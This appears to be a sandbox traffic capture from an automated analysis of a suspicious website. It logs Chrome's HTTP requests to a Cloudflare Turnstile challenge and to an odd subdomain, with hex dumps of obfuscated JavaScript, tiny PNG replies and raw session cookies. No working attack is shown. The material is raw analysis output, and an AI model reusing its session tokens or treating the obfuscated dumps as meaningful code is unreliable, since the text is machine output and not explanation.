                          2024-05-22 15:56:51 UTC1369INData Raw: 37 30 29 5d 3d 69 7a 28 34 34 36 29 2c 66 4e 5b 69 7a 28 33 34 32 33 29 5d 3d 69 7a 28 31 35 34 39 29 2c 66 4e 5b 69 7a 28 31 34 37 33 29 5d 3d 69 7a 28 39 35 36 29 2c 66 4e 5b 69 7a 28 33 30 32 38 29 5d 3d 69 7a 28 32 39 31 39 29 2c 66 4e 5b 69 7a 28 31 34 36 38 29 5d 3d 69 7a 28 32 34 32 31 29 2c 66 4e 5b 69 7a 28 39 30 36 29 5d 3d 69 7a 28 35 31 32 29 2c 66 4e 5b 69 7a 28 33 32 37 35 29 5d 3d 69 7a 28 31 36 34 35 29 2c 66 4e 5b 69 7a 28 32 37 36 33 29 5d 3d 69 7a 28 32 34 35 37 29 2c 66 4e 5b 69 7a 28 31 38 34 35 29 5d 3d 69 7a 28 31 34 31 38 29 2c 66 4e 5b 69 7a 28 32 34 36 34 29 5d 3d 69 7a 28 31 30 37 35 29 2c 66 4e 5b 69 7a 28 32 32 38 33 29 5d 3d 69 7a 28 31 31 36 37 29 2c 66 4e 5b 69 7a 28 32 34 30 30 29 5d 3d 69 7a 28 39 34 36 29 2c 66 4e 5b 69
                          Data Ascii: 70)]=iz(446),fN[iz(3423)]=iz(1549),fN[iz(1473)]=iz(956),fN[iz(3028)]=iz(2919),fN[iz(1468)]=iz(2421),fN[iz(906)]=iz(512),fN[iz(3275)]=iz(1645),fN[iz(2763)]=iz(2457),fN[iz(1845)]=iz(1418),fN[iz(2464)]=iz(1075),fN[iz(2283)]=iz(1167),fN[iz(2400)]=iz(946),fN[i
                          2024-05-22 15:56:51 UTC1369INData Raw: 28 31 39 37 30 29 2c 66 4f 5b 69 7a 28 31 33 39 37 29 5d 3d 69 7a 28 32 31 37 39 29 2c 66 4f 5b 69 7a 28 35 38 36 29 5d 3d 69 7a 28 31 32 36 38 29 2c 66 4f 5b 69 7a 28 33 34 32 32 29 5d 3d 69 7a 28 32 37 35 37 29 2c 66 4f 5b 69 7a 28 32 33 37 36 29 5d 3d 69 7a 28 31 33 34 36 29 2c 66 4f 5b 69 7a 28 32 33 32 31 29 5d 3d 69 7a 28 31 39 33 30 29 2c 66 4f 5b 69 7a 28 37 38 39 29 5d 3d 69 7a 28 32 30 30 38 29 2c 66 4f 5b 69 7a 28 31 35 36 32 29 5d 3d 69 7a 28 32 38 31 35 29 2c 66 4f 5b 69 7a 28 32 38 36 39 29 5d 3d 69 7a 28 32 34 31 39 29 2c 66 4f 5b 69 7a 28 32 39 30 30 29 5d 3d 69 7a 28 31 31 30 32 29 2c 66 4f 5b 69 7a 28 33 30 33 33 29 5d 3d 69 7a 28 33 33 33 31 29 2c 66 4f 5b 69 7a 28 31 37 39 37 29 5d 3d 69 7a 28 32 38 34 34 29 2c 66 4f 5b 69 7a 28 32 31
                          Data Ascii: (1970),fO[iz(1397)]=iz(2179),fO[iz(586)]=iz(1268),fO[iz(3422)]=iz(2757),fO[iz(2376)]=iz(1346),fO[iz(2321)]=iz(1930),fO[iz(789)]=iz(2008),fO[iz(1562)]=iz(2815),fO[iz(2869)]=iz(2419),fO[iz(2900)]=iz(1102),fO[iz(3033)]=iz(3331),fO[iz(1797)]=iz(2844),fO[iz(21
                          2024-05-22 15:56:51 UTC1369INData Raw: 33 32 37 35 29 5d 3d 69 7a 28 35 36 38 29 2c 66 51 5b 69 7a 28 32 37 36 33 29 5d 3d 69 7a 28 32 31 37 31 29 2c 66 51 5b 69 7a 28 31 38 34 35 29 5d 3d 69 7a 28 31 31 34 39 29 2c 66 51 5b 69 7a 28 32 34 36 34 29 5d 3d 69 7a 28 33 32 33 38 29 2c 66 51 5b 69 7a 28 32 32 38 33 29 5d 3d 69 7a 28 32 37 34 33 29 2c 66 51 5b 69 7a 28 32 34 30 30 29 5d 3d 69 7a 28 31 32 39 37 29 2c 66 51 5b 69 7a 28 31 32 30 30 29 5d 3d 69 7a 28 31 33 33 32 29 2c 66 51 5b 69 7a 28 31 30 37 34 29 5d 3d 69 7a 28 37 32 35 29 2c 66 51 5b 69 7a 28 34 37 35 29 5d 3d 69 7a 28 33 30 34 37 29 2c 66 51 5b 69 7a 28 31 37 35 36 29 5d 3d 69 7a 28 32 30 37 39 29 2c 66 51 5b 69 7a 28 39 39 32 29 5d 3d 69 7a 28 32 38 35 36 29 2c 66 51 5b 69 7a 28 31 35 30 30 29 5d 3d 69 7a 28 32 32 35 35 29 2c 66
                          Data Ascii: 3275)]=iz(568),fQ[iz(2763)]=iz(2171),fQ[iz(1845)]=iz(1149),fQ[iz(2464)]=iz(3238),fQ[iz(2283)]=iz(2743),fQ[iz(2400)]=iz(1297),fQ[iz(1200)]=iz(1332),fQ[iz(1074)]=iz(725),fQ[iz(475)]=iz(3047),fQ[iz(1756)]=iz(2079),fQ[iz(992)]=iz(2856),fQ[iz(1500)]=iz(2255),f
                          2024-05-22 15:56:51 UTC1369INData Raw: 29 5d 3d 69 7a 28 33 30 30 32 29 2c 66 52 5b 69 7a 28 31 35 36 32 29 5d 3d 69 7a 28 31 30 34 33 29 2c 66 52 5b 69 7a 28 32 38 36 39 29 5d 3d 69 7a 28 32 37 37 36 29 2c 66 52 5b 69 7a 28 32 39 30 30 29 5d 3d 69 7a 28 32 30 34 36 29 2c 66 52 5b 69 7a 28 33 30 33 33 29 5d 3d 69 7a 28 32 30 39 37 29 2c 66 52 5b 69 7a 28 31 37 39 37 29 5d 3d 69 7a 28 38 32 37 29 2c 66 52 5b 69 7a 28 32 31 36 39 29 5d 3d 69 7a 28 32 32 36 30 29 2c 66 52 5b 69 7a 28 31 39 38 31 29 5d 3d 69 7a 28 39 30 32 29 2c 66 52 5b 69 7a 28 32 36 30 33 29 5d 3d 69 7a 28 31 32 30 34 29 2c 66 52 5b 69 7a 28 33 30 32 30 29 5d 3d 69 7a 28 35 30 34 29 2c 66 52 5b 69 7a 28 32 35 34 32 29 5d 3d 69 7a 28 31 33 32 30 29 2c 66 53 3d 7b 7d 2c 66 53 5b 69 7a 28 33 33 37 30 29 5d 3d 69 7a 28 31 37 31 34
                          Data Ascii: )]=iz(3002),fR[iz(1562)]=iz(1043),fR[iz(2869)]=iz(2776),fR[iz(2900)]=iz(2046),fR[iz(3033)]=iz(2097),fR[iz(1797)]=iz(827),fR[iz(2169)]=iz(2260),fR[iz(1981)]=iz(902),fR[iz(2603)]=iz(1204),fR[iz(3020)]=iz(504),fR[iz(2542)]=iz(1320),fS={},fS[iz(3370)]=iz(1714
                          2024-05-22 15:56:51 UTC1369INData Raw: 69 7a 28 31 32 30 30 29 5d 3d 69 7a 28 39 37 31 29 2c 66 54 5b 69 7a 28 31 30 37 34 29 5d 3d 69 7a 28 32 30 31 36 29 2c 66 54 5b 69 7a 28 34 37 35 29 5d 3d 69 7a 28 35 35 37 29 2c 66 54 5b 69 7a 28 31 37 35 36 29 5d 3d 69 7a 28 33 30 32 31 29 2c 66 54 5b 69 7a 28 39 39 32 29 5d 3d 69 7a 28 31 32 32 37 29 2c 66 54 5b 69 7a 28 31 35 30 30 29 5d 3d 69 7a 28 33 30 30 35 29 2c 66 54 5b 69 7a 28 32 31 38 32 29 5d 3d 69 7a 28 32 33 33 39 29 2c 66 54 5b 69 7a 28 32 32 35 30 29 5d 3d 69 7a 28 32 34 36 37 29 2c 66 54 5b 69 7a 28 36 32 35 29 5d 3d 69 7a 28 32 38 38 30 29 2c 66 54 5b 69 7a 28 32 35 38 33 29 5d 3d 69 7a 28 31 30 30 38 29 2c 66 54 5b 69 7a 28 39 30 39 29 5d 3d 69 7a 28 31 39 30 34 29 2c 66 54 5b 69 7a 28 31 37 38 34 29 5d 3d 69 7a 28 32 32 39 39 29 2c
                          Data Ascii: iz(1200)]=iz(971),fT[iz(1074)]=iz(2016),fT[iz(475)]=iz(557),fT[iz(1756)]=iz(3021),fT[iz(992)]=iz(1227),fT[iz(1500)]=iz(3005),fT[iz(2182)]=iz(2339),fT[iz(2250)]=iz(2467),fT[iz(625)]=iz(2880),fT[iz(2583)]=iz(1008),fT[iz(909)]=iz(1904),fT[iz(1784)]=iz(2299),
                          2024-05-22 15:56:51 UTC1369INData Raw: 7a 28 32 31 36 39 29 5d 3d 69 7a 28 33 30 36 32 29 2c 66 55 5b 69 7a 28 31 39 38 31 29 5d 3d 69 7a 28 31 34 32 32 29 2c 66 55 5b 69 7a 28 32 36 30 33 29 5d 3d 69 7a 28 32 35 36 37 29 2c 66 55 5b 69 7a 28 33 30 32 30 29 5d 3d 69 7a 28 32 34 30 33 29 2c 66 55 5b 69 7a 28 32 35 34 32 29 5d 3d 69 7a 28 31 32 35 39 29 2c 66 56 3d 7b 7d 2c 66 56 5b 69 7a 28 33 33 37 30 29 5d 3d 69 7a 28 33 32 39 36 29 2c 66 56 5b 69 7a 28 33 34 32 33 29 5d 3d 69 7a 28 32 36 32 39 29 2c 66 56 5b 69 7a 28 31 34 37 33 29 5d 3d 69 7a 28 31 32 35 30 29 2c 66 56 5b 69 7a 28 33 30 32 38 29 5d 3d 69 7a 28 32 36 37 36 29 2c 66 56 5b 69 7a 28 31 34 36 38 29 5d 3d 69 7a 28 36 36 38 29 2c 66 56 5b 69 7a 28 39 30 36 29 5d 3d 69 7a 28 31 38 32 30 29 2c 66 56 5b 69 7a 28 33 32 37 35 29 5d 3d
                          Data Ascii: z(2169)]=iz(3062),fU[iz(1981)]=iz(1422),fU[iz(2603)]=iz(2567),fU[iz(3020)]=iz(2403),fU[iz(2542)]=iz(1259),fV={},fV[iz(3370)]=iz(3296),fV[iz(3423)]=iz(2629),fV[iz(1473)]=iz(1250),fV[iz(3028)]=iz(2676),fV[iz(1468)]=iz(668),fV[iz(906)]=iz(1820),fV[iz(3275)]=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.449749104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:51 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:51 UTC240INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:51 GMT
                          Content-Type: image/png
                          Content-Length: 61
                          Connection: close
                          cache-control: max-age=2629800, public
                          Server: cloudflare
                          CF-RAY: 887dffa579187c93-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                          Data Ascii: PNGIHDRsIDAT$IENDB`


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.449750104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:52 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:52 UTC240INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:52 GMT
                          Content-Type: image/png
                          Content-Length: 61
                          Connection: close
                          cache-control: max-age=2629800, public
                          Server: cloudflare
                          CF-RAY: 887dffaafb5d196c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                          Data Ascii: PNGIHDRsIDAT$IENDB`


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.449738188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:52 UTC1338OUTGET /favicon.ico HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/infd201971/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6Ilk0L1dSZVJ5TGJsOVRGTHNiWUxvS2c9PSIsInZhbHVlIjoiRjhRQU1qKzVESlpKZzVxQ3JmdmpPLy9SZGhBWHZwTGNLQ3FxeHI0QVZSOWNkOWEzVHZvZytuQ2tNT0FUUEdxemtETUx2T2hkR2V6YXpMMTRDN2UvTnJELzlubUxFY2RGdGRYYTN5WmJOWDh4UnE3RHpqOGo5N2JTekF0RmpqMjUiLCJtYWMiOiIwNWNlNTQ3ZGY2OWVlZGVmY2JmMThjNzEwMGZmODkxNWViZjFmODExODIyZjMyY2M0ZGJjMDEyYTQ1ZDI5ODI1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik53VTU4TzlpczB4ZUtOcGczZGN3K2c9PSIsInZhbHVlIjoiV0dhQW5WcEtNd2Q1bldEcWRRT3Zacll4RU9uWFpXWVp4R1RUQkVQcTZWWEhNQ2ZzTU9tTXhMM3l3by9FYUJwSGhlc0xmTW5CWTBRMWpNTms4NVlrYWIvM3RUTmcrWW1wd1IyMXZFdlpMc1lrOTBqbjJHVC92S1pmMzdpTWRYdEQiLCJtYWMiOiJmYjlkNzZmYTYxZTdlMTZiNTVhZjAzMmI1OGY1OGM4ODNlMzczZjE0YTZkNzI5YzdjNDkwMjI4ZmYyMTE4YWY4IiwidGFnIjoiIn0%3D
                          2024-05-22 15:56:54 UTC633INHTTP/1.1 404 Not Found
                          Date: Wed, 22 May 2024 15:56:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: max-age=14400
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0ekmHGO7BUUglj6sVXOCa9jW07J8%2BxhGuG7Gv6MyDJybA0DboQ9jX0yG5TgYHIu5YEKn4thwxOiKUMkx%2FMexzmMCRwigRjh97ib6vpP%2B%2F%2BpdHyAcT0C3menqQZ3Rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          CF-Cache-Status: MISS
                          Server: cloudflare
                          CF-RAY: 887dffadff6c42fd-EWR
                          2024-05-22 15:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.449752104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:53 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 2674
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Content-type: application/x-www-form-urlencoded
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          CF-Challenge: 4d20fcc93ec5b5c
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Origin: https://challenges.cloudflare.com
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:53 UTC2674OUTData Raw: 76 5f 38 38 37 64 66 66 39 66 36 64 38 66 34 32 39 64 3d 34 77 78 49 71 49 32 63 39 72 74 6e 78 38 77 58 54 57 39 47 39 79 39 66 49 58 5a 49 4f 32 55 50 6e 58 39 76 4c 4d 39 34 55 38 4a 39 48 76 39 50 73 59 61 75 4c 48 77 4b 74 34 39 54 58 61 4c 74 25 32 62 39 6a 37 57 39 24 6a 59 39 39 59 61 49 74 4a 39 41 6d 58 68 6e 44 39 39 37 73 39 62 49 68 57 39 33 49 38 4c 39 51 49 38 2b 6c 2b 39 38 75 39 43 54 75 7a 4d 55 4c 39 59 45 75 39 4e 47 38 5a 4a 69 42 39 68 45 32 68 63 79 6e 49 38 7a 34 4e 39 68 71 6b 71 78 78 66 46 59 49 37 49 39 4f 6f 74 38 57 65 46 58 39 73 49 68 72 39 50 75 39 54 49 38 44 63 49 44 49 7a 39 38 69 35 34 63 59 6b 73 64 78 77 71 75 2d 42 4d 75 32 71 63 4b 74 39 74 48 51 49 58 6a 46 54 42 24 48 61 4d 75 34 50 33 64 74 63 39 74 54 4d 39 74
                          Data Ascii: v_887dff9f6d8f429d=4wxIqI2c9rtnx8wXTW9G9y9fIXZIO2UPnX9vLM94U8J9Hv9PsYauLHwKt49TXaLt%2b9j7W9$jY99YaItJ9AmXhnD997s9bIhW93I8L9QI8+l+98u9CTuzMUL9YEu9NG8ZJiB9hE2hcynI8z4N9hqkqxxfFYI7I9Oot8WeFX9sIhr9Pu9TI8DcIDIz98i54cYksdxwqu-BMu2qcKt9tHQIXjFTB$HaMu4P3dtc9tTM9t
                          2024-05-22 15:56:54 UTC731INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:54 GMT
                          Content-Type: text/plain; charset=UTF-8
                          Content-Length: 121040
                          Connection: close
                          cf-chl-gen: KhnBp7gnyxMD+FDcpN5aqpV+VenppfGGXrMqq8fMvQP81sRPifFCdHTF/Yh1kDDDoKm6moVRNwD11GP9qn2/e4qVcVFvxJ9SZkqwVZERK+qaaZWE3jo4wcDuWjRNAUUd2G99OTtbP1CrLYDR9iDWTti79/UfuUDFTSZ7VO0gbD3bsJODb1NAu0vC0kkeBDyPSErngFXBf9ujiyXr6nqUVhZQb09GQRl+MnhYQoev3L20rdWeMs9eXh4QwSyiWvygaSPxMuvpj7JfngTtYzz7qLaW//zl0wIyBpjWbC3OgrAXjbyiT+dVIMWjas52XXyAddVPf/Js2hBtQVASp0dxc2Tcb/ZaVzc5wJrHoRRuSG/yLndM8j/xprhHdWYzD+g1KvaYkLQC5spWWUqRuGTDWaCDNj51DNsh0I+cvL2dWuC1m1nRZTbGPVjBlQ50PSRrygr5oEYyGMZx5v9oxs69pA==$uwL4sydHd00KWp/NDoluTA==
                          Server: cloudflare
                          CF-RAY: 887dffb5df564211-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:54 UTC638INData Raw: 66 47 78 47 54 34 64 70 61 6b 31 56 62 5a 4f 4d 69 6d 65 54 5a 47 71 4e 6e 59 31 7a 65 31 36 43 6c 58 70 32 70 4b 70 33 6a 49 79 4b 6f 6f 68 2b 6e 33 4b 4e 6a 70 61 73 6b 6e 68 72 71 48 4b 47 68 58 32 32 66 35 6c 38 70 4b 43 2b 77 59 42 2b 67 70 36 35 6c 4b 69 63 71 61 36 6d 76 4a 47 75 6a 4a 61 56 73 70 48 45 32 64 62 53 6c 73 44 66 71 64 43 65 74 36 33 55 6f 73 6d 32 77 72 76 47 76 63 65 6e 36 73 48 48 33 4b 76 66 37 4b 6e 58 36 73 71 34 35 37 76 49 7a 74 37 41 39 72 7a 63 2b 75 59 4a 41 39 66 4b 39 4d 54 39 42 52 44 37 2f 76 4d 45 38 41 66 66 31 51 2f 31 30 75 77 50 43 2b 67 67 44 50 54 65 39 4e 30 50 45 42 45 62 47 50 76 72 47 52 37 34 41 42 77 41 49 78 34 72 42 53 51 55 4b 41 6f 45 4a 41 6b 6e 48 50 45 4d 4f 54 6e 39 49 30 42 48 50 54 4d 4a 51 55 6f
                          Data Ascii: fGxGT4dpak1VbZOMimeTZGqNnY1ze16ClXp2pKp3jIyKooh+n3KNjpasknhrqHKGhX22f5l8pKC+wYB+gp65lKicqa6mvJGujJaVspHE2dbSlsDfqdCet63Uosm2wrvGvcen6sHH3Kvf7KnX6sq457vIzt7A9rzc+uYJA9fK9MT9BRD7/vME8Aff1Q/10uwPC+ggDPTe9N0PEBEbGPvrGR74ABwAIx4rBSQUKAoEJAknHPEMOTn9I0BHPTMJQUo
                          2024-05-22 15:56:54 UTC1369INData Raw: 6b 38 4b 6a 73 74 51 30 73 2b 4e 57 4a 50 61 54 41 35 57 30 59 33 61 47 6c 75 65 32 42 33 54 6e 46 6d 65 32 46 6a 69 31 64 48 56 6d 57 50 54 49 39 52 6b 30 2b 48 63 70 43 45 64 70 46 32 6a 5a 65 56 57 33 4f 63 62 4a 64 79 64 70 65 67 6b 6f 57 69 61 36 74 6e 5a 61 39 69 65 35 46 70 6b 49 4b 44 63 34 43 71 6c 6e 65 63 63 36 79 2f 6e 49 79 2f 6c 49 43 32 76 6f 43 6e 6e 5a 37 46 6e 61 75 4c 76 71 71 37 78 39 43 74 6a 73 61 66 73 62 47 33 32 63 6e 48 74 4e 65 53 32 72 69 33 6d 39 66 69 76 4c 6a 69 75 63 61 71 31 73 50 4d 30 4d 4c 48 78 75 66 46 38 64 44 44 7a 50 58 44 73 73 37 35 37 66 58 53 2f 66 4b 2b 31 67 4c 30 35 39 6f 47 2b 4e 76 65 43 76 76 4b 34 67 34 41 43 75 59 53 42 76 66 71 46 67 6e 57 37 68 6f 4e 45 76 41 41 48 68 45 6b 39 2b 38 54 46 76 6a 33 2f
                          Data Ascii: k8KjstQ0s+NWJPaTA5W0Y3aGlue2B3TnFme2Fji1dHVmWPTI9Rk0+HcpCEdpF2jZeVW3OcbJdydpegkoWia6tnZa9ie5FpkIKDc4Cqlnecc6y/nIy/lIC2voCnnZ7FnauLvqq7x9CtjsafsbG32cnHtNeS2ri3m9fivLjiucaq1sPM0MLHxufF8dDDzPXDss757fXS/fK+1gL059oG+NveCvvK4g4ACuYSBvfqFgnW7hoNEvAAHhEk9+8TFvj3/
                          2024-05-22 15:56:54 UTC1369INData Raw: 51 59 45 35 66 55 32 52 6a 61 6a 68 73 65 44 78 52 66 31 6c 51 63 6d 61 45 5a 58 69 48 67 6e 31 56 68 33 39 4f 67 48 36 4c 5a 47 65 53 53 48 47 44 68 34 6c 6a 6e 56 65 4e 6e 47 71 68 6a 35 46 63 6b 4a 71 6b 64 71 43 69 71 6f 53 41 6d 49 47 69 65 62 47 50 6b 49 36 47 6a 34 53 5a 75 49 2b 61 66 58 69 6e 6a 71 47 55 72 63 43 62 74 4a 7a 42 77 72 70 39 66 70 65 59 6e 35 32 2f 79 49 58 49 6b 71 4f 51 32 62 54 4d 7a 64 4f 74 75 4a 62 64 30 62 76 50 32 61 36 68 31 4e 76 69 74 63 62 62 34 4b 58 64 35 63 33 79 35 71 72 55 74 73 58 31 38 73 66 74 7a 37 75 77 75 4d 76 33 76 74 6e 66 2b 38 44 63 34 2b 48 49 34 39 66 74 78 75 66 63 38 74 48 73 42 67 7a 55 37 50 54 68 32 50 44 6f 44 4e 62 33 36 78 6a 67 47 53 48 6b 4a 65 2f 79 43 42 59 6e 41 77 59 4e 2b 7a 44 75 48 75
                          Data Ascii: QYE5fU2RjajhseDxRf1lQcmaEZXiHgn1Vh39OgH6LZGeSSHGDh4ljnVeNnGqhj5FckJqkdqCiqoSAmIGiebGPkI6Gj4SZuI+afXinjqGUrcCbtJzBwrp9fpeYn52/yIXIkqOQ2bTMzdOtuJbd0bvP2a6h1Nvitcbb4KXd5c3y5qrUtsX18sftz7uwuMv3vtnf+8Dc4+HI49ftxufc8tHsBgzU7PTh2PDoDNb36xjgGSHkJe/yCBYnAwYN+zDuHu
                          2024-05-22 15:56:54 UTC1369INData Raw: 54 48 68 6d 4e 47 35 52 67 56 68 30 66 45 39 75 66 46 56 30 65 55 6c 72 53 58 31 4c 59 33 6c 50 59 31 4a 54 66 6f 79 55 64 35 57 54 61 6c 69 61 6a 36 42 35 6c 32 36 4e 56 32 4b 65 67 47 61 70 67 49 71 4e 6c 71 32 76 5a 32 2b 53 70 4a 53 78 6e 34 35 32 74 6f 61 4d 64 62 79 6e 65 70 6c 34 6d 5a 36 68 6e 4d 47 6a 6d 72 36 5a 78 71 47 38 67 63 4f 4d 78 5a 47 79 78 74 4c 51 78 38 47 34 77 39 43 57 71 73 69 75 32 35 69 35 76 73 47 38 34 63 4f 2b 33 72 6e 6d 77 64 32 68 34 36 7a 6c 73 64 4c 6d 38 76 44 6e 30 39 62 71 74 2b 6a 32 37 67 4c 30 2b 75 36 39 78 62 33 79 2f 75 58 41 34 65 58 6c 42 73 76 2b 34 2b 48 38 43 2b 66 68 45 78 6e 75 32 52 6a 5a 46 65 30 4f 46 42 34 62 48 67 30 6a 38 69 66 6d 35 2f 59 70 36 67 59 66 36 4f 77 52 49 7a 45 52 45 53 34 4f 43 69 77
                          Data Ascii: THhmNG5RgVh0fE9ufFV0eUlrSX1LY3lPY1JTfoyUd5WTaliaj6B5l26NV2KegGapgIqNlq2vZ2+SpJSxn452toaMdbynepl4mZ6hnMGjmr6ZxqG8gcOMxZGyxtLQx8G4w9CWqsiu25i5vsG84cO+3rnmwd2h46zlsdLm8vDn09bqt+j27gL0+u69xb3y/uXA4eXlBsv+4+H8C+fhExnu2RjZFe0OFB4bHg0j8ifm5/Yp6gYf6OwRIzERES4OCiw
                          2024-05-22 15:56:54 UTC1369INData Raw: 7a 34 35 51 58 35 7a 56 34 64 6a 52 47 78 72 64 59 46 64 69 49 71 53 55 57 4f 41 6c 31 5a 76 54 34 39 52 64 56 74 65 64 5a 52 34 6f 46 6d 67 6b 6d 53 6f 70 34 71 44 70 49 4f 68 72 35 69 4a 66 5a 36 4f 6b 34 71 4e 6f 33 4a 33 69 35 74 30 6a 35 75 62 74 4c 65 59 6a 73 47 2b 78 35 56 2b 6b 62 4f 57 68 70 2f 4b 75 71 47 4b 6a 5a 2b 2b 6b 39 48 48 70 38 54 62 79 35 66 56 74 37 2f 61 6e 36 76 5a 6f 75 4b 67 78 65 69 62 6f 37 75 73 35 75 44 6e 78 4e 37 6f 73 62 54 69 37 72 47 79 35 66 6e 57 31 75 33 74 75 66 6a 58 79 76 62 4d 76 66 48 65 2b 2b 62 38 35 51 6a 48 34 63 72 2b 79 50 72 66 44 63 2f 66 45 68 58 54 30 4e 6f 52 31 64 44 7a 44 41 41 69 34 65 77 59 37 79 66 6a 43 67 4d 69 46 78 6e 33 45 65 63 4c 42 42 2f 77 35 78 67 72 38 76 58 32 38 2f 73 49 2b 68 31 43
                          Data Ascii: z45QX5zV4djRGxrdYFdiIqSUWOAl1ZvT49RdVtedZR4oFmgkmSop4qDpIOhr5iJfZ6Ok4qNo3J3i5t0j5ubtLeYjsG+x5V+kbOWhp/KuqGKjZ++k9HHp8Tby5fVt7/an6vZouKgxeibo7us5uDnxN7osbTi7rGy5fnW1u3tufjXyvbMvfHe++b85QjH4cr+yPrfDc/fEhXT0NoR1dDzDAAi4ewY7yfjCgMiFxn3EecLBB/w5xgr8vX28/sI+h1C
